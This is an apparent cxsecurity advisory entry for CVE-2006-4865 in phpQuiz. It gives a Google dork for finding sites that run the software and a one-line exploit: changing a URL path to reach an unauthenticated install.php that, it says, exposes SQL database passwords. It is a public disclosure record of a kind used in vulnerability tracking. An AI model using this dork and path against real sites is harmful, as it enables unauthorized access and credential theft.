phpQuiz sensitive file (install.php)

Published
Credit
Risk
2006.09.21
sn0oPy
Low
CWE
CVE
Local
Remote
N/A
CVE-2006-4865
No
Yes
Dork: intitle:"phpQuiz" | " Développé par PhpQuiz v.1.0 " | "© PhpQuiz" | inurl:"PhpQuiz"

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

* phpQuiz sensitive file (install.php without authentification) + Files containing interesting info (passwords for sql db)

* By : sn0oPy

* Risk : low

* Site : http://phpquiz.com/

* Dork : intitle:"phpQuiz" | " Développé par PhpQuiz v.1.0 " | "© PhpQuiz" | inurl:"PhpQuiz"

* exploit :

http://target.com/[phpquiz_path]/front/

replace by :

http://target.com/[phpquiz_path]/cfgphpquiz/install.php

* greetz : [subzero], Avg Team, Lhma9.


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2015, cxsecurity.com